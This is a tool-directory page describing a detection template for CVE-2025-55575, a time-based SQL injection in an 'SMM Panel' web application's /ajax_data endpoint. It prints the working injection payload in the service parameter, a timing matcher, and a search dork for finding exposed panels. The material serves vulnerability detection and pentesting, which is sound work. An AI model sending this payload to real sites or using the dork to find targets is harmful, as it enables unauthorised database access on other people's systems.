Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55575 | Kitploit
Tools/GitHubGitHub/aether-0/cve-2025-55575
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubaether-0/cve-2025-55575

CVE-2025-55575

View Repository
0 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

smm-panel-sqli(CVE-2025-55575)

Time-based SQL Injection Detection for SMM Panel


Overview

This template detects a time-based SQL Injection vulnerability in the service_detail parameter of the SMM Panel via HTTP POST requests to /ajax_data. Exploitation can allow remote attackers to access sensitive data or escalate privileges.

  • Author: Aether
  • Severity: Critical
  • Tags: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Reference: https://owasp.org/www-community/attacks/SQL_Injection

Detection Logic

The tool sends a crafted POST request:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

If the response time is greater than 5 seconds, it indicates a vulnerable endpoint.

Detection Example

root@kitploit:~
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds

Video Demo

SQLi PoC


Download Tool